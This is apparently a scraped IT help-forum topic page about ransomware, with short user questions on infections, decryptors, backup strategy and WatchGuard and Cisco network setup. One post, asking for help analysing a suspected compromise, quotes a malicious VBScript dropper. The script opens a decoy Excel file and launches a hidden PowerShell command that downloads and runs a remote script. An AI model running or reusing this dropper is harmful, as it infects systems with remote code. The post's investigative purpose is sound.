Ransomware

155

Solutions

384

Contributors

Ransomware is malicious software, designed to block data access in order to extort money. As a form of malware, ransomware is most often used to infiltrate devices through infected emails or links that, in turn, recognize and take advantage of vulnerabilities in the operating system and installed third-party software.

Share tech news, updates, or what's on your mind.

Sign up to Post

What is the best free way to clone an hard drive (moving to SSD)

with a bootdisk. so I don't need to install anything on windows.
0
INTRODUCING: WatchGuard's New MFA Solution
LVL 1
INTRODUCING: WatchGuard's New MFA Solution

WatchGuard is proud to announce the launch of AuthPoint, a powerful, yet simple, Cloud-based MFA service designed to eliminate the vulnerabilities that put your data, systems, and users at risk.

Had an Vista PC brought in to me today, with a scareware remote story.  The computer is LOCKED (Pictures attached).  Drive was pulled and no virus/malware/rootkit found.  Ctrl+Alt+Del allows me to open task manager, but I cannot actually do anything with hit.  The mouse is constrained to the middle of the screen away form Task Mgr, and keyboard input closes everything immediately and then reopens the locked password request.  No actual Ransomware is found on the computer asking for money or providing a phone number or e-mail.   No change when logging into Safe Mode of any flavor.  Replacing registry from regback didn't solve it.
20180810_111145.jpg
20180810_111150.jpg
0
Hi,

I used to use This Acronis Drive Monitor free software for SATA drive (the name of the file is ADM_en-us.exe).
The Lenovo T470 has mSATA drive; I tried to use the above software for Lenovo T470, but did not work.

Question: Is there a free software for mSATA drive monitor please.

Thanks,
tjie
0
hello all,

I am an owner of a small business in my town, I got infected by a ransomware, with .rapid extension, he wants a big ransom that I cant pay.
any solution for this version. please help.
0
I have Acronis for backups to tape.  I want to be able to backup "System State" of my DC.  What files or folders do I need to make sure get backed up?
0
I had this question after viewing Watchguard Firewall xFlow Configuration.
0
can anyone identify which encrypted ransomware renames the files to *.ZEUS? ..does anyone know if there is a decrypter?
0
What are the best practices in light of ransomware attacks. I've had a few local non rotating backups get bricked because of ransomware. I do have remote backup, but is everyone resorting to rotating backup drives?
0
I have server and backup drive that got hit with Globeimposter 2.0 via brute force remote desktop attack. Nothing is salvageable but I can still access Active Directory users. Is there anyway to export, manually backup critical files to recover active directory in a new install?
0
we have a SBS2008 server that had recently been effected by malware.
Our webroot antivirus program saw it and deleted it.
now the server backup will not run.
it still shows in windows features as being installed but there is no block level backup in services.

Would removing the feature and adding it back fix this issue or do you think its something bigger that would need Microsoft support involved?
0
MSSPs - Are you paying too much?
LVL 1
MSSPs - Are you paying too much?

WEBINAR: Managed security service providers often deploy & manage products from a variety of solution vendors. But is this really the best approach when it comes to saving time AND money? Join us on Aug. 15th to learn how you can improve your total cost of ownership today!

Has anyone used Acronis Server Backup 12.5 (or any server backup) to a AWS S3 cloud storage? Does AWS accept FTP or SFTP connections to S3 Storage?
It seems their cloud storage is priced well. $276/yr for a TB. Any comments to cloud storage in general for backups?
0
We are deploying Windows 10 workstations using True Image.  I want to set browser default to IE, and PDF default to adobe.  
The 2 methods I researched are below.  In your opinion, should I build the defaults into the image, or just use GPO?  
Also,  if I choose to build the defaults into the image, will the OSD method work with Acronis True Image?  Or will I have to implement this a different way?


http://ccmexec.com/2015/09/making-ie-the-default-browser-in-windows-10-during-osd/

https://social.technet.microsoft.com/Forums/en-US/eb905851-b27f-4330-aa10-d7165c7a521f/switching-pdf-opening-from-edge-for-all-users?forum=win10itprogeneral
0
We have been hit with ransomware.  Please see the attached screenshot.

The file extensions have been changed to STG.

They hacked into the network, created admin users and made them part of the Admin group, created shares etc.
0
I have a machine well, a user's profile infected with Nozelesn ransomware.  Is there anyway to clean it?
0
Customer has a watchguard T10 firebox firewall for a pos system.  The POS server connects directly to the trusted network port. no other computers connect to that network.  

Customer wants to setup an access point for wifi.  The watchguard has a 3rd port.  I want to activate it as a second network and allow wireless devices to access the internet.  

The watchguard firewall does not have built in wifi.  We purchased an access point that we plan to connect to the 3rd port.

This is a restaurant, there are no office pc's or network printers.

Need suggestions on policy's, the device has contenfilter subscriptions.  I want to enforce them on the 3rd port too if possible.
0
We believe a client has been hacked but can't determine what the vb script is doing to the data, it doesn't look like ransomware.
can you help point us in a direction to what degree this hack could be.

below is the vbscript and a picture of a folder it has been found in. you will see that actual excel doc has been hidden and a fake excel doc in it's place. it looks like when the fake excel doc is run, it opens up the vbscript and the hidden excel doc

VBscript
Set fso = CreateObject("Scripting.FileSystemObject")
Set shl = CreateObject("WScript.Shell")
Set shp = CreateObject("WScript.Shell")
path=shl.ExpandEnvironmentStrings("%APPDATA%")+"\"+GetUUID(".")
exists = fso.FolderExists(path)
Set objFile = fso.GetFile(Wscript.ScriptFullName)
rr = fso.GetParentFolderName(objFile)+"\Project 8192 LNG STS System Certification Log.xlsx"
if (exists) then
shl.Run("explorer.exe "+rr+"")
Else
shl.Run("explorer.exe "+rr+"")
shp.Run "powershell.exe  -windowstyle hidden -executionpolicy bypass -command iex((nEw-ObJect ('NEt.WeBclient')).('DowNLoAdStrInG').invoKe(('https://cflfuppn.eu/sload/2.0/netF.ps1')))",0,True
Set shp = Nothing
end if
Function GetUUID(strComputer)
Dim objWmi, colItems, objItem, strUUID, blnValidUUID
Set objWmi = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set colItems = objWmi.ExecQuery("Select * from Win32_ComputerSystemProduct")
strUUID = ""
blnValidUUID = False
For Each objItem in colItems
strUUID = objItem.UUID
If Not …
0
How to block RFC 1918 and create object-groups and use that object-groups to block any udp traffic inbound to the external interface on a WatchGuard Firebox (M200)?
0
Are 32 bit computers at a higher risk of Anti-Virus, Malware or Ransomware infections?

We have a few left and I need to know if I should trash them ASAP.
0
Long story short - My client did not agree to an end to end backup solution and lost everything to ransomware.

Situation:
-Client has 1 Poweredge R710 that I will be rebuilding with Server 2016 Datacenter. I plan on two VM's, one for the DC and one for a Fileserver.
-The client only has roughly 100GB of live data, so retention is flexible.
-The client has about 10 workstations, I'm thinking about using Synology Cloudstation for local file backup on the workstations.
-The client is now letting me acquire 2x Synology NAs devices (DS718+)
-The client is still not willing to pay for a well known 3rd party solution like Datto/Veem etc. *sigh*
-I do have an existing license for Altaro that I may as well use


Question:

Since I am starting from scratch, with more hardware, I have an opportunity to be a little more creative.

Getting a backup done via Windows, Altaro, and/or Synology "Active Backup" is straight forward enough. How to be sure I am protecting the client from ransomware to the best of my ability is where I would like some advice.

One NAS will be off site storage. For the on site NAS, Should I set up an ISCSI drive with security on the Host Server? What other security concerns can I be sure to cover ahead of time as far as accessing and storing these backups?

I know the NAS has its own built in accounts which I'm guessing will protect the offsite backups from credentials being compromised.
0
Cloud Class® Course: Microsoft Exchange Server
LVL 12
Cloud Class® Course: Microsoft Exchange Server

The MCTS: Microsoft Exchange Server 2010 certification validates your skills in supporting the maintenance and administration of the Exchange servers in an enterprise environment. Learn everything you need to know with this course.

I'm trying to connect a Watchguard T30 to an AP320 through a Cisco Catalyst 2960.

I'm able to set up trunking on the Cisco so that I can see the AP320 through the controller, however when I connect to the WLAN I get no DHCP address, and I can't get online even when I hard code the IP. Based on some logging information I've seen on the Watchguard, it almost looks as though the Cisco switch is sending packets to the wrong gateway address.

It looks like when a device was requesting an IP on the VLAN 192.168.5.1/24 subnet that request was sent to the lan 192.168.1.1 gateway.

I'm extremely new to Cisco so it's entirely possible I'm missing something obvious, but when the VLAN's are set up on the router and then trunking is configured for those VLAN's on the Cisco, is there a place where you need to specify what Gateway to use for each trunk?
0
We have a Watchguard M200 firewall that we would like to limit inbound/outbound bandwidth to 20Mbps on our External (WAN) interface. Our ISP allows for 40Mbps total bandwidth. I've gone into Traffic Management and changed the interface to limit bandwidth to 20Mbps but this only seems to apply to upstream outbound traffic. Inbound traffic is still coming in at the fulll 40Mbps. Is it possible to also limit inbound traffic to 20Mbps?

Thank you
0
Hi!
I´m trying to use programm by James-Gourley to decrypt a 1.4.0.0 version of Cryakl  . Some files are decrypted correctly, and other files are not decrypted with  "encryption signature mismatch" message. Help me please. Sample files https://dropmefiles.com/769Q7   More examples of unencrypted files https://dropmefiles.com/CZ7xH
0
Good day-
I have an Ntfs volume from a failed server 2003 (not a typo). The volume was RAID1 and a member file server.

Ntfs permissions are keeping me from accessing previous versions - although I can see the previous versions thru explorer.

Any tools you can think of or am I dreaming?
0
After being hit with Ransomware, restoring from backup, and reinstalling applications as needed, I can't get the Quickbooks Database Server services started or the Quickbooks Database Server Manager to run. When I browse for files and 'Start Scan", it attempts to start the services after browsing the files, finding Quickbooks files. It claims the folder in which the company files live isn't shared. I guess that's technically true, but the directory one level up IS shared, so it's possible to browse to it from a network share. Then it tells me it is attempting to resolve Networking issues, and tells me after that to resolve network issues and try again later (not the exact syntax, obviously).

I have tried installing just the bare server (what we had done in the past), installing the full version of Quickbooks (2016 for the moment), uninstalling, rebooting the server (2008 R2), reinstalling just the database server, using the Quickbooks clean boot utility, disabling ALL firewalls (Kaspersky and WIndows Firewall), I can't get the QBDbMgrN to start and stay started. I can't get the QuickbooksDB26 started. For some reason it claims to be a service that should be started manually. I don't recall that having been the case in the past.  Also,  I don't think the QuickbooksDB26 ever disappeared, even after a clean install (using the Clean Install tool), an uninstall, and/or a reboot.

Previous to the ransomware, the server had Quickbooks 2015 and 2017 database servers installed. …
0
I currently have a Watchguard Firebox in place and have recently purchased a Cisco Catalyst 2960 to server as our primary switch. Our Watchguard currently manages our WAP's (also Watchguard) which have a private and public wifi network which is segmented through the use of VLAN's.

I'm extremely new to Cisco and I'm trying to determine how I would go about configuring the ports on the switch to pass along all VLAN traffic which should allow the WAP's to continue functioning.
0

Ransomware

155

Solutions

384

Contributors

Ransomware is malicious software, designed to block data access in order to extort money. As a form of malware, ransomware is most often used to infiltrate devices through infected emails or links that, in turn, recognize and take advantage of vulnerabilities in the operating system and installed third-party software.